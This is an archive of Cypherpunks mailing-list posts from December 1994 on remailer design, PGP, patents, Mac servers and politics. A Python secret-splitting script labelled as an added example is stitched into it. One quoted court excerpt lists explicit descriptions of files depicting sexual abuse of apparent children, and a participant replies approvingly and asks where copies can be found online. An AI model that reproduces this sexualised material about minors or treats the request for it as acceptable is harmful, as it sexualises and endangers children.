Eric Hughes will present ``Towards the Equivalence of Breaking the Diffie-Hellman Protocol and Computing Discrete Logarithms'', a paper from Crypto '94 by Ueli M. Maurer. Eric has been active in the Cypherpunks movement for several years now. Additional speakers are of course welcome. Discussions of implementations of crypto systems are welcome also. Please contact me (ktk at sgi.com or ktk at syzygy.com) asap if you are interested in speaking. Presentations need not be long. Suggestions for dinner are welcome. ----------------------------------------------------------------------------- DIRECTIONS: Silicon Graphics, Inc. Building 5 (SGI Cafeteria) 2025 North Shoreline Boulevard Mountain View, CA >From 101 take Shoreline East. This is towards Shoreline Amphitheatre. It's also "logical east", and points more north that east. (That is, it's east with respect to 101 North, which points west near the exit.) If you're coming in on 101 South, you'll cross over the bridge. Continue on Shoreline and go past a whole bunch of other SGI buildings. Turn right onto Steirlin Court at the big red metal sculpture. There will be even more SGI buildings surrounding you--take note of the building numbers. Go almost to the end of this street. Building 5 is on the right. From tjb at acpub.duke.edu Mon Dec 5 22:46:02 1994 From: tjb at acpub.duke.edu (Tom Bryce) Date: Mon, 5 Dec 94 22:46:02 PST Subject: Are there *any* internet services runnable from powerpc Message-ID: <199412060645.BAA07462@acpub.duke.edu> I'm still thinking I'd like to provide some internet services from my power mac. I have my own IP address and the folks at network services said they don't mind if I run a WWW server, and they will even change the name assigned to my IP address if I don't like it. So it sounds to me like I can provide internet services. I hesitate to run a web server because I hear there are lots of security bugs and I won't subject my mac to that. 
I am looking for a unix emulator that is freeware for the macintosh. I was directed to one apparently freeware unix platform for the mac by someone on the cypherpunks list, but it says it does not support ethernet which is how I am interfaced. I have a power mac 7100 with an ethernet port to the internet. Does anyone know if I could, for example, get scripts for Eudora to snarf mail and run a keyserver, or set up an anon remailer, or do anything at all remotely cool and for the betterment of the crypto/privacy/pgp/etc. services available to the internet public? I could leave my mac on 24/7 serving up services. When I'm debugging code it might crash, but I suppose there should be fail-safe systems. It doesn't seem like I can do much unless I buy a unix emulator, and I don't have the money for that. I'm a student. Tom ------------------------------------------------------------------------ Tom Bryce for PGP public key finger tjbryce at amherst.edu From cactus at hks.net Mon Dec 5 23:40:19 1994 From: cactus at hks.net (L. Todd Masco) Date: Mon, 5 Dec 94 23:40:19 PST Subject: MMB question Message-ID: <199412060745.CAA07323@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Schneier mentions MMB in the section following IDEA (in 11.10) of _Applied_ _Cryptography_, but notes that it's brand-spanking new at the time of _AC_'s publication. He mentions that "Eli Biham thinks that a 128-bit block size actually weakens the algorithm." What's the current thought on MMB? Has it undergone serious analysis and if so, what's the conclusion been? Thanks, - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuQWbSoZzwIn1bdtAQH14wGAiDedhz9smWvZ4Taph8ITrMJq+Ey+J/MT 3TXoYa+j3YAbh2OU6l0Lc/M+uQy1vVBP =Ejvv -----END PGP SIGNATURE----- From cactus at hks.net Mon Dec 5 23:53:35 1994 From: cactus at hks.net (L. Todd Masco) Date: Mon, 5 Dec 94 23:53:35 PST Subject: Patents to be placed in PD Message-ID: <199412060758.CAA07429@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- This appeared on the IPSEC list (Hooray!). jwlowe at IBM followed up by announcing the dedication of IBM's patent #5,148,479 to the public. Is this the apocalypse or something? Never have I seen such signs of rationality in companies of this size. - ------- start of forwarded message (RFC 934 encapsulation) ------- From: Ashar.Aziz at eng.sun.com (Ashar Aziz) Newsgroups: hks.lists.ipsec Subject: SKIP patents will be in public domain Date: 5 Dec 1994 15:44:20 -0500 Lines: 17 Sender: root at bb.hks.net Message-ID: <9412051928.AA25371 at miraj.Eng.Sun.COM> NNTP-Posting-Host: bb.hks.net I am happy to state that Sun management has asked me to make the following statement regarding the SKIP patents. 1. The SKIP patents (when they issue) will be placed in the public domain. Anyone may use it if they wish, with no rights or dues pertaining to Sun. There will be no need to license SKIP patent rights. 2. Sun Microsystems did this to help the industry make progress in the area of security. We view this as an indication of our willingness to promote open standards. I thank all of you who publicly commented on this issue, because your comments helped bring about this change in Sun's policy. Regards, Ashar. - ------- end ------- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuQZaioZzwIn1bdtAQH/AAGAtvm78gyEj6C+kWfogHJjuMdr7MGW634Z 9n4cYfkPb6G0bmlzMv7Y0X7MAcLwuJk7 =Ux5s -----END PGP SIGNATURE----- From wcs at anchor.ho.att.com Tue Dec 6 00:12:16 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 6 Dec 94 00:12:16 PST Subject: public accounts / PGP / passphrases Message-ID: <9412052048.AA08276@anchor.ho.att.com> Adam wrote: > Derek wrote: > | It would be nice to integrate PGP into terminal emulators, too, like > | kermit or seyon or red ryder or whatever, so that you could easily use > | PGP locally to sign/encrypt things on the remote end. Wishful > | thinking, I guess... > > I think terminal emulators are the wrong layer for PGP > integration. PGP support is needed in document editors and viewers, > rather than in network layers. The terminal emulator we used to use at Bell Labs, ctrm, was designed to let you interact conveniently between your DOS machine and a Unix system you were dialed into; it felt like you were controlling things from the Unix end. Thus, you could issue Unix commands to initiate file transfer via kermit or xmodem (utopc *, pctou *), and you could also issue Unix commands to run DOS commands back on the PC - the commands basically sent back an escape sequence saying ESC RUN foo.exe arg arg arg CR or whatever. It was easy to build applications that did things like crunch up mail messages into temp files, download the file to DOS, run Lotus or WordStar on it, and haul the result back. You could take the same approach with PGP if you wanted - the support you need in document viewers is the ability to hand chunks of the document/mail message off to an arbitrary program for processing. Coincidentally (:-), MIME lets you do this sort of thing. 
I don't know if ctrm is still around - it was designed by an employee and we were allowed to use it internally, but I don't think it was sold outside. But it wouldn't be too hard to add that sort of capability to your favorite source-included freeware terminal emulator, and then you could build convenient PGP tools, remote Mosaic viewers, etc. out of it. Bill From lmccarth at ducie.cs.umass.edu Tue Dec 6 00:26:07 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 6 Dec 94 00:26:07 PST Subject: Freeport information Message-ID: <199412060831.DAA07772@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Michelle Montpetite writes (forwarded by Sam Kaplin): > Anonymous users have read-only access (e.g. they cannot > post to the bulletin boards nor send e-mail); [...] > Prerequisite software > > FreePort is distributed in source code. You will need > typical Unix program development tools including a C > compiler, yacc, and linker. The publicly available > layered software mentioned above is available from > various ftp sites on the internet, (where ?) > or is available from CWRU as a complete collection of the prerequisite > source code. (where ?) [...] > Installation and maintenance of the FreePort software > requires an experienced Unix Systems Programmer. The > technical support person requires 'root' access to > install and configure the various prerequisite > communications software. [...] > Licensing > > A 5-year renewable FreePort 2.3 license for a nonprofit > site is $850 ($2800 for-profit). The software is > shipped as a "tar" file on 8mm Exabyte cartridge, or > for extra cost, on 1/2" magnetic tape or DC6150 > cartridge. I'm still not clear about what's free and what costs eight hundred bucks. > The software is AS IS. Stupid is as stupid does ? Zen and the art of software maintenance. - - -L. 
Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuQf4Gf7YYibNzjpAQEBxwP/QuZ5dkFDpJvMJAWNyqvUd02XudTq+Fod mrPmnY/2JxoxpHbXwbVs6BFvV1R3iEg+/0NpumQxSZYV9bcN5o7yBm5LSjCFurIW 2NkDbAaaEG6e9rV3efzhFO2FCe2jmrcXPkUVIGLORxMJ3oS7cZyYBpZNDidN+fOP z9lBWln7MC4= =h+xK - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuQhISoZzwIn1bdtAQFdeAF/SJVofZS/anhfZe8RkuxJajt1xQZV/aZR n8B66+zP0aCMXZhfdMU2u/udI5LTCcLG =RsyI -----END PGP SIGNATURE----- From MIKEINGLE at delphi.com Tue Dec 6 00:30:59 1994 From: MIKEINGLE at delphi.com (Mike Ingle) Date: Tue, 6 Dec 94 00:30:59 PST Subject: One-shot remailer replies Message-ID: <01HKB4JDI40290QGGZ@delphi.com> >>The remailers need a one-time reply mechanism. > >>This would enable many other things, including "persistent" anonymous >>entities, without using broadcast techniques. The current remailers >>encourage hit-and-run anonymity, like the recent burst of anonymous >>nastiness, and discourage conversational anonymity and persistent >>anonymous entities. Sending a one-way message is easy and fairly secure. > >Bill Stewart pointed out some of the problems with one-shot reply >addresses, although he seemed to be analyzing them as features which the >remailers provided against the users' will. I think Mike's idea was >that this is something which remailer users would like. Still, Bill's >comments seem valid. How useful is a single-use reply address? If you >posted a message to a mailing list or newsgroup only the first person >would get through to you. 
You could post a message with a list of >reply addresses but that would open up some traffic analysis problems. Yes, they are supposed to be voluntary and created by the user in advance. I don't want mandatory replyability, just to make conversation easier. As for replies from a list or newsgroup, use the pigeonholes. Anonymous reply is an enabling primitive for all kinds of servers and anonymous mechanisms. >>One way to do this: each remailer has a list of secret (symmetric) keys. >>Each secret may have an expiration date. By some method (problem discussed >>later) the user and the remailer establish a shared secret, adding it to the >>list, while the remailer does not find out who the user is. The reply ticket >>contains a series of nested hops, each encrypted with that remailer's secret >>plus all the others after it. >As you have seen, this model is very similar to Chaum's 1981 paper except >for where the secret keys come from. This is not to disparage your ideas >but it's just that as long as we have giants around, we might as well >stand on their shoulders. Chaum's system was considerably simpler as it >used ordinary PK decryption of the address at each stage, with the header >including a secret key that would encrypt the body to maintain >unlinkability. As you point out this has a certain kind of vulnerability >to coercion that your scheme is less sensitive to. Chaum's system isn't too different if the remailers generate new keys on a regular basis. That would forcibly expire reply tickets when the keys were changed, whether they had been used or not. >>The catch: how do we establish a shared secret with the remailer, without >>identifying ourselves to it? If the first remailer (the one the replyer >>sends the ticket to) is corrupt, and it knows who established the secret >>contained in the ticket, it knows the end-to-end path of the message. 
>> Problem: remailers are coerced or hacked to decrypt a captured secret- >> establishing message, before the secret key is expired. Trail of a reply >> ticket can then be followed. Solution: no good one that I can think of. >We tend not to worry so much about this forward vulnerability as we do >about the reverse one. Partially this is because our current remailers >don't implement Chaum's scheme, but partially too we sense that an >interesting public pseudonym is a more inviting target than the hopefully >anonymous true name behind it. I'm not really sure how good an >assumption this is, though. So I am less inclined to view Chaum's scheme >as broken since the remailer network inherently suffers the same >vulnerabilities. We hope to develop enough independent remailers that >the coercion issue will not be a major problem. True, outside traffic analysis is the major problem, as long as there are enough hops to withstand a few bad remailers. Forward (source capture) vulnerability is harder to stop. >Tim May has advocated >hardware, tamper-proof circuits to hold the keys so that coercion is >impossible. Yes, but I actually want to build this thing. Fairly soon even. >Plus, I think an important part of the picture which is not currently >being implemented is remailer key changes. This can provide forward >secrecy similar to your scheme. Once last week's key is gone, there is >no longer any danger of your message ever being traced (as long as you >trust the remailer to truly erase it, just as in your scheme). This >would be useful both for ordinary remailing and for Chaum-style reply >blocks, which as I say are both vulnerable to the reply-with-coercion >attack. Better is perhaps a three-day key with one overlap, that is, a current key and one "last key" kept around at all times. >There is one attack on all these schemes which you didn't mention, which is >that the bad guys are the first one to try the return address and coerce >each remailer along the way. 
This might be especially dangerous in the >case of your "pigeonhole" described below, where the pigeonhole account >makes for a tempting target for the snoopers, giving them a chance to >intercept the reply message back to you and be the first ones to be using >it. True, the path has to be there, or the message can't go. I can't think of a fix for that one, can you? Mostly I just don't want an endlessly growing amount of information out there. I want old information to die after a while, as keys are erased or expired. [ DH exchange / Key broadcast approach ] Broadcasting a list of keys is one possibility; what if someone else uses the same key? Birthday theorem makes this hard to prevent. >>Given a secure two-way messaging mechanism, persistent anonymous identities >>are established using a "pigeonhole service". This is a service, with a >>publicized address, that will accept public-key encrypted mail and store it >>in a "pigeonhole". The owner of the pigeonhole anonymously sends a request >>(with authentication) and a reply ticket. The pigeonhole service sends the >>owner his mail using the ticket. > >This is a good idea, although there is a tradeoff between frequent polls >of the pigeonhole, which might allow some traffic analysis particularly >if there is a suspected link between persona and true name, and less >frequent checks, which may cause high priority messages to be delayed. Pigeonhole holds a one-time reply address. Every week or two it expires and you send a new one. If a mail comes in, it uses it, and you send a new one. >>The non-anonymous user could reply with any mail reader, send the message >>back to the remailer that sent it to him, and the message would be >>transported securely back to the anonymous user that sent it. > >Yes, well, we do this already with our current remailers. 
>Many
>people have written clients to create these reply blocks, along with
>little instructions to the baffled recipient to cut and paste the reply
>block at the front of the reply message. Once in a while these even
>work, I think.
>With your pigeonhole idea you don't need this, you can just have a
>Reply-To that points at the pigeonhole, which is one of its biggest
>advantages.

Methinks I'd make it a little more robust than the existing systems (easy
with perl) like being able to grep out a reply header anywhere in the
message, ignore > indentation, and similar safety precautions.

>>For reliability in a large remailer network, end-to-end reliability is
>>better than point-to-point reliability. Messages should be m-of-n secret
>>shared before transmission, and reassembled at the terminal end. For
>>clientless reception, the terminal node remailer could do the reassembly
>>and splitting of replies.
>
>I agree with this. This also relates to issue of message size
>quantization with cryptographically strong padding. I don't suppose the
>RSAREF library could do that...
>Yes, this is a good idea. I first read about this in the 1993 Crypto
>conference proceedings, in a paper called "Secret Sharing Made Short" by
>Hugo Krawczyk. You might find the paper useful although it sounds very
>similar to what you have in mind already.

RSAREF is useful for public key and DH. Secret sharing we have to get for
ourselves. I looked at Shade v1.0, and it seems to be broken on
little-endian machines. It works on an HP-UX machine, but fails on a
PC running linux with small-endian enabled in shade.h. The half-hour setup
delay is not encouraging, either. Your SECSPLIT is nice and simple, but each
shade is the size of the message. What I need is an error-correcting
protocol to build a no-growth secret splitter.
>Considering all the pros and cons, I am afraid that even the security of
>the one-shot return address is probably insufficient, especially when the
>simple "post replies to usenet encrypted with this key" is so easy and
>safe. Granted it will be a problem once everybody starts doing that, but
>flooding is going to be hard to beat for safety.

Yes, broadcast is the most secure, but it has a fundamental problem:
security scales linearly with bandwidth. If you have a pool of 100 users and
one of them gets a message, your uncertainty is 1 in 100. I've tried without
success to figure out a broadcast mechanism where security scales faster
than linearly with bandwidth.

Any system with a unique path is subject to an attack where each element of
the path is examined in turn. If the path forks and sends to several people,
the security is enhanced only to the extent that more people are annoyed.

We need a mechanism where there is either a circulating data stream or a
large file on a server. An incoming message alters the data somehow,
diffusing the changes over a large area. A request for information selects
out some transformation of the selected data in such a way that the server
cannot correlate the incoming message with the outgoing message. I don't see
any way to do this.

Elimination of the replay traffic-analysis problem is major progress. As for
step-by-step coercion back to the source, I don't see a fix, and we will
probably have to live with that unless there is a major breakthrough.

Mike

From shamrock at netcom.com Tue Dec 6 00:33:12 1994
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 6 Dec 94 00:33:12 PST
Subject: Are there *any* internet services runnable from powerpc
Message-ID:

Tom wrote:

>I have a power mac 7100 with an ethernet port to the internet.
>Does anyone
>know if I could, for example, get scripts for Eudora to snarf mail and run
>a keyserver, or set up an anon remailer, or do anything at all remotely
>cool and for the betterment of the crypto/privacy/pgp/etc. services
>available to the internet public? I could leave my mac on 24/7 serving up
>services. When I'm debugging code it might crash, but I suppose there
>should be fail-safe systems.
>
>It doesn't seem like I can do much unless I buy a unix emulator, and I
>don't have the money for that. I'm a student.

Yeah, A/UX is rather overpriced. But you don't need it for a web site. Your
PPC can provide any Web service your heart desires without you having to buy
A/UX. You can open an HTTP server using the excellent MacHTTP, a ftp site
using Peter Lewis' MacFTP, etc. You can even use perl on the Mac using
MacPerl, the list goes on. All these programs are available at your friendly
neighbourhood InfoMac mirror site.

I am not so sure about the keyserver, though. I suppose it might be possible
to write an AppleScript for the new scriptable versions of MacPGP and
Eudora, but I don't think it would be worth the effort. There are enough
keyservers out there.

IMHO, the best source of info regarding running your own web server on a Mac
is the MacHTTP mailing list. You can join by sending a message to
listserv at oac3.hsc.uth.tmc.edu with "SUBSCRIBE MACHTTP_TALK Your Name" in
the body of the message. Also check the MacHTTP home page for announcements
and frequently asked questions and answers. It can be found at:

http://www.uth.tmc.edu/mac_info/machttp_info.html

Enjoy,

-- Lucky Green
   PGP encrypted mail preferred.
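Added example (not part of any message in this archive, and not code from the list members or from Krawczyk's paper): a Python sketch of the "no-growth" threshold splitter Mike Ingle asks for in his message above, following the outline Hal gives later in this thread: encrypt under a random key, spread the ciphertext as polynomial coefficients so each fragment is about 1/K of the message, and Shamir-split the key. Assumptions: an HMAC-SHA256 keystream stands in for IDEA/DES, arithmetic is per byte in GF(2^8), shares are evaluated at x = 1..N rather than 0..N-1, and all function names are hypothetical.

```python
import hashlib
import hmac
import secrets

# GF(2^8) log/antilog tables (AES polynomial 0x11B, generator 3).
EXP, LOG = [0] * 510, [0] * 256
_v = 1
for _i in range(255):
    EXP[_i] = EXP[_i + 255] = _v
    LOG[_v] = _i
    _v ^= (_v << 1) ^ (0x11B if _v & 0x80 else 0)   # multiply by 3

def gmul(a, b):
    return 0 if a == 0 or b == 0 else EXP[LOG[a] + LOG[b]]

def gdiv(a, b):
    return 0 if a == 0 else EXP[LOG[a] + 255 - LOG[b]]

def poly_eval(coeffs, x):
    """Horner evaluation; coeffs[0] is the constant term."""
    y = 0
    for c in reversed(coeffs):
        y = gmul(y, x) ^ c
    return y

def lagrange_basis(xs):
    """Coefficient vectors of the Lagrange basis polynomials for points xs."""
    basis = []
    for j, xj in enumerate(xs):
        poly, denom = [1], 1
        for m, xm in enumerate(xs):
            if m == j:
                continue
            nxt = [0] * (len(poly) + 1)
            for i, c in enumerate(poly):      # poly *= (x + xm); minus is plus here
                nxt[i] ^= gmul(c, xm)
                nxt[i + 1] ^= c
            poly, denom = nxt, gmul(denom, xj ^ xm)
        basis.append([gdiv(c, denom) for c in poly])
    return basis

def keystream_xor(key, data):
    """Stand-in cipher (assumption): HMAC-SHA256 counter keystream, not IDEA/DES."""
    out = bytearray()
    for off in range(0, len(data), 32):
        pad = hmac.new(key, off.to_bytes(8, "big"), hashlib.sha256).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + 32], pad))
    return bytes(out)

def split(message, k, n):
    """Return n shares (x, key_share, fragment); any k of them rebuild message."""
    if not 1 <= k <= n <= 255:
        raise ValueError("need 1 <= k <= n <= 255")
    key = secrets.token_bytes(16)
    plain = len(message).to_bytes(4, "big") + message
    plain += bytes(-len(plain) % k)                   # pad to a multiple of k
    ct = keystream_xor(key, plain)
    # Shamir polynomials for the key: constant term is the key byte.
    key_polys = [[b] + list(secrets.token_bytes(k - 1)) for b in key]
    shares = []
    for x in range(1, n + 1):
        # Dispersal: each run of k ciphertext bytes is one polynomial's coefficients.
        frag = bytes(poly_eval(ct[i:i + k], x) for i in range(0, len(ct), k))
        key_share = bytes(poly_eval(p, x) for p in key_polys)
        shares.append((x, key_share, frag))
    return shares

def combine(shares, k):
    """Rebuild the message from any k distinct shares."""
    shares = shares[:k]
    if len(shares) < k or len({s[0] for s in shares}) < k:
        raise ValueError("need k shares with distinct x")
    basis = lagrange_basis([s[0] for s in shares])

    def coeffs(ys):                                   # polynomial through the k points
        out = [0] * k
        for b, y in zip(basis, ys):
            for i in range(k):
                out[i] ^= gmul(b[i], y)
        return out

    key = bytes(coeffs([s[1][i] for s in shares])[0] for i in range(16))
    ct = b"".join(bytes(coeffs([s[2][i] for s in shares]))
                  for i in range(len(shares[0][2])))
    plain = keystream_xor(key, ct)
    return plain[4:4 + int.from_bytes(plain[:4], "big")]

if __name__ == "__main__":
    msg = b"constructed sample message for the remailer network " * 4
    parts = split(msg, k=3, n=5)
    print(len(msg), [len(f) for _, _, f in parts])
    print(combine([parts[4], parts[0], parts[2]], 3) == msg)
```

Each share carries a fragment of roughly len(message)/K bytes plus a 16-byte key share; the keystream here gives no integrity protection, so a corrupted share yields garbage rather than an error.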
From cdodhner at PrimeNet.Com Tue Dec 6 00:41:43 1994
From: cdodhner at PrimeNet.Com (Christian Odhner)
Date: Tue, 6 Dec 94 00:41:43 PST
Subject: MIT Keysigner CA
In-Reply-To: <199412031813.KAA17366@largo.remailer.net>
Message-ID:

On Sat, 3 Dec 1994, Eric Hughes wrote:

> From: Christian Odhner
>
> I trust a key to be an introducer if and when
> I am sure that a signature by that key means that the signed key belongs
> to the identity (be it "real" or a 'nym) it claims to represent.
>
> There is a qualitative difference between a real identity and a
> pseudonym identity. A real identity has a body attached to it and a
> pseudonym identity does not. The phrase "belongs to" cannot be used
> in the same sense for both of these, and the failure to discriminate
> between them is a fallacy.

I understand the difference and was not attempting to equate the two, just
save a few words.. :)

> As far as an MIT autosigner, the signature will simply represent a
> reduction to the trustability of the MIT account assignment procedure.
> This is not a reduction to bodily identity and should not be construed
> as such.

That's the point I was trying to make, only you said it a little better.

> Derek.) The signature here represents an attestation that a given key
> (that is, a given identity) can be reached through a particular
> mailbox.

*THAT* is the usefulness that I hadn't realized. Thanks for pointing it out.

Happy Hunting, -Chris.

______________________________________________________________________________
Christian Douglas Odhner     | "The NSA can have my secret key when they pry
cdodhner at primenet.com      | it from my cold, dead, hands... But they shall
pgp 2.3 public key by finger | NEVER have the password it's encrypted with!"
cypherpunks WOw dCD Traskcom Team Stupid
Key fingerprint = 58 62 A2 84 FD 4F 56 38 82 69 6F 08 E4 F1 79 11
------------------------------------------------------------------------------

From skaplin at skypoint.com Tue Dec 6 00:43:52 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Tue, 6 Dec 94 00:43:52 PST
Subject: Valid mail -> usenet gateway for alt.security.keydist
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Does anyone have a valid mail -> usenet gateway for alt.security.keydist?
I've tried a few and they don't seem to work.

==============================================================================
No doubt Jack the Ripper excused himself on the grounds that it was human
nature. --A. A. Milne--
==============================================================================
skaplin at skypoint.com                  | "...vidi vici veni" - Overheard
                                        | outside a Roman brothel.
PGP encrypted mail is accepted and      |
preferred.                              | Change is the only constant in the
                                        | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com   | Smile!! Big brother is watching.
==============================================================================

This message digitally signed to verify the identity of the writer.
From anon at losers.hacktic.nl Tue Dec 6 03:10:28 1994
From: anon at losers.hacktic.nl (anon at losers.hacktic.nl)
Date: Tue, 6 Dec 94 03:10:28 PST
Subject: no subject (file transmission)
Message-ID: <199412061111.AA16360@xs1.xs4all.nl>

Remailed by: anon at losers.hacktic.nl
X-Remailer-Software: Remail for Waffle 1.4

>
> Could someone bring me up to speed on this group? On the surface, it
> would seem that there is a lot in common with their objectives and the
> general Cypherpunks "philosophy". (quotes because I understand the
> diversity of thought in this group.)

Posted earlier:

> From nobody at soda.BErkeley.EDU Wed Aug 3 11:12:35 PDT 1994
> Article: 17449 of alt.privacy
> Xref: netcom.com alt.privacy:17449
> Path: netcom.com!netcomsv!decwrl!spool.mu.edu!cass.ma02.bull.com!soda.BErkeley.EDU!nobody
> From: nobody at soda.BErkeley.EDU (Tommy the Tourist, Anon User)
> Newsgroups: alt.privacy
> Subject: OCEANIA GETS SCREWED!
> Date: 28 Jul 1994 20:47:23 -0000
> Organization: Bull Worldwide Information Systems.
> Lines: 65
> Sender: daemon at cass.ma02.bull.com
> Distribution: world
> Message-ID: <199407282045.NAA24571 at soda.Berkeley.EDU>
> NNTP-Posting-Host: cass.ma02.bull.com
> Status: RO
>
>
> From CompuServe's Libertarian Political Issues Forum
>
>
> Subject: #216752-Oceania?
> From: Scott A. Kjar 70402,3124
> To: L D Weller 71011,1743
>
> It turned out to all be a scam, actually. The key people involved, Eric
> Kline and Chuck Geshlieder, allegedly had a scheme set up where they
> repeatedly paid themselves out of all of the proceeds. It apparently went
> something like this:
>
> 1) Donations came to Oceania. Kline and Geshlider, as principals, got
> paid a portion.
>
> 2) Oceania then contracted with The Gold Standard Press, owned by Kline
> and Geshlider, to do printing. Kline got a share as the sales rep.
>
> 3) Gold Standard Press then printed fund-raising letters for Oceania.
> Kline and Geshlider split the profits, as partners in Gold Standard.
>
> 4) Oceania sent out more fund-raising requests.
>
> 5) Donations came to Oceania. (see #1)
>
> It fell apart when Kline and Geshlider allegedly accused each other of
> fraud, and Geshlider apparently took his case to the Nevada State Attorney
> General's Consumer Fraud Division. (Poor Chuck, there were no consumers
> in this transaction.) What is amazing about all of this is that The Gold
> Standard was an ILLEGAL business (no business license) and Chuck had been
> hauled before a judge a few months ago on this very charge. He allegedly
> threatened to beat her up in the parking lot (something he has threatened
> to virtually everyone who has ever met him), and then skipped town for a
> couple of weeks. The people at the Attorney General's office apparently
> were astounded that Chuck, who is knowingly running an illegal business,
> and is not keeping any records the IRS might get hold of, is complaining
> about his business partner and co-conspirator about a scam. After all,
> there are NO Gold Standard Press records, and there are NO Oceania
> records. (It turns out that Kline was simply writing checks Pay To The
> Order of Cash, and then using the cash to cover his reversals in the Stock
> Market.)
>
> Eventually, their need for cash apparently outstripped the rate at which
> suckers were sending them money, and like hungry wolves, set upon each
> other.
>
> GOOD RIDDANCE!
>
> p.s. I know both of these jerks personally. We have tried to throw them
> out of the LP in Las Vegas for several years. Like counterfeit money,
> they just keep turning up!
>
>
> ------------
> To respond to the sender of this message, send mail to
> remailer at soda.berkeley.edu, starting your message with
> the following 7 lines:
> ::
> Response-Key: ideaclipper
>
> ====Encrypted-Sender-Begin====
> MI@```$!S^P;+]AB?X9TW6\8W2:NP&2&04%GSR=BW]`^+`=)MFOA[ER>?SK)G
> 8$I$XG.1&][YD$P&3*E2?3N6*&SLZ:_5^
> ====Encrypted-Sender-End====
>
>

From usura at xs4all.nl Tue Dec 6 03:31:43 1994
From: usura at xs4all.nl (Alex de Joode)
Date: Tue, 6 Dec 94 03:31:43 PST
Subject: Valid mail -> usenet gateway for alt.security.keydist
Message-ID: <199412061132.AA18904@xs1.xs4all.nl>

In article you stated:

: Does anyone have a valid mail -> usenet gateway for alt.security.keydist?
: I've tried a few and they don't seem to work.

You can use the {usura,remailer}@xs4all.nl for that, instead of
Anon-Post-To: , use the header Post-To: alt.security.keydist ,
(it will -not- be anonymised, if you use simple Post-To: ).

A detailed help-file is available by sending mail to this address with
a "Subject: remailer-help".

Hope this helps,

--
Exit! Stage Left.
Alex de Joode

From jkreznar at ininx.com Tue Dec 6 03:46:05 1994
From: jkreznar at ininx.com (John E. Kreznar)
Date: Tue, 6 Dec 94 03:46:05 PST
Subject: Shrinking government
In-Reply-To: <9412051130.1.17207@cup.portal.com>
Message-ID: <9412061145.AA15280@ininx>

-----BEGIN PGP SIGNED MESSAGE-----

H. Keith Henson writes

> It may be that a general cutting down on the powers of the Federal
> Government is in order.

How could you doubt it?

> This has pros and cons,

Name a con.

> and support (in some areas) even from the RR.

That's ok. Without a government to wield, they would be ignorable.

> How *does* one shrink the unshrinkable? Tax revolts (in the
> form of massive political pressure) seem to come about when the tax
> rates get as high as they are now.

Tax revolts do no good. Taxes are the _result_, not the cause.

The cause of big government is popular gratuitous acceptance of
government favor.
If you want to shrink government, you've got to begin by changing the minds of a hundred million of your neighbors who think it's civilized to take a government job or contract, accept social security, apply for an SBA loan or FEMA assistance, and on down the list. I know a tax revolter who held an anti-tax rally on a tax-funded picnic ground without even noticing or acknowledging the inconsistency. This is why it's unshrinkable. We have met the enemy, and he is us. John E. Kreznar | Relations among people to be by jkreznar at ininx.com | mutual consent, or not at all. -----BEGIN PGP SIGNATURE----- Version: 2.3a iQCVAgUBLuRNEsDhz44ugybJAQHpIgP/a3fFhRrub8X3KQu5EHYy94+nsfOu788b Mv2yXisQSEBjUR41IIU7ieTzq5B9nPHY3D2wWJ70EQmZOJ2bWQl1HMosoRSwd3eL oNZQvu+DPsvZFAge/BQyFjCDaQCme9Xm+rXC8psqGmGT9avQE7ti+OSEnFQ+lSJj FYv/Lj69vlM= =4m98 -----END PGP SIGNATURE----- From jamesd at netcom.com Tue Dec 6 06:52:11 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 6 Dec 94 06:52:11 PST Subject: AABBS Conviction relation to child porn? In-Reply-To: <0098881E.4950521B.51@INS.INFONET.NET> Message-ID: <199412061451.GAA16613@netcom18.netcom.com> ED KELLY writes > "AA-8278.GIF" described as "FULL SCREEN VIEW! > A HAIRLESS PUSSY NAILED TO A TABLE!", > > "AA-7153.GIF" described as "MOTHER IS WATCHING > HER DAUGHTER FUCK BIG COCK! NO TITS!", > > "AA-8682.GIF" described as "HE MAKES HIS DAUGHTER > SUCK COCK! SHE IS FISTING HER SISTER!", and > > "AA-11935.GIF" described as "HE FUCKS HIS DAUGHTERS > HAIRLESS CUNT!" SHE FISTS HER MOTHER!" > > -------------------------- > > COUNT 4: > > "AA-15198.GIF" described as "BLONDE LOLITA HAS NO TITS! > SUCKS HUGE COCK AND DRINKS SPERM!" Sounds great. Are there any copies of the evidence available on the net? And please lay off the capital letters. It is rude to shout. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. 
Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.comorg

From LAURENN%smtpgate at earth.wri.org Tue Dec 6 07:46:07 1994
From: LAURENN%smtpgate at earth.wri.org (LAURENN%smtpgate at earth.wri.org)
Date: Tue, 6 Dec 94 07:46:07 PST
Subject: Interesting WWW Profile site...
Message-ID: <9412061103.aa23116@earth.wri.org>

From: Gleason Sackman ("SACKMAN at PLAINS.NODAK.EDU")
To: net-happenings at is.internic.net
